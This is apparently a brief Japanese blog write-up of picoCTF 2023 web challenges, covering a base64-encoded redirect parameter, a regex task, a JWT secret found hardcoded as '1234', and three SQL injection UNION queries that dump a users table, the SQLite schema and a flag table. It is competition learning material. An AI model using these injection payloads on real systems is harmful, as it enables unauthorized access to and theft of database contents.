picoCTF 2023 Writeup

web問だけ解きました。

Web Exploitation

このような2つのリダイレクトがあった。他に意味のありそうなものは無かったので、idパラメタをbase64decodeするとflagだった。

正規表現でマッチさせるだけ。 .*だけだとだめだった。

XXE

query: ' UNION SELECT * FROM users --

query: ' UNION SELECT group_concat(sql), group_concat(sql), group_concat(sql) FROM sqlite_master --

query: ' UNION select flag, flag, flag from more_table --

認可にJWTを使ってるんですね。

生成コードに穴とか無いかなと思ってみてみたら。

// not so random
return "1234";

めちゃめちゃハードコーディングされておった!?!

ここまで解いた後に「冴えない彼女の育てかた」というライトノベルにハマってしまい、あとの問題は解けてません。根気が足りなかった。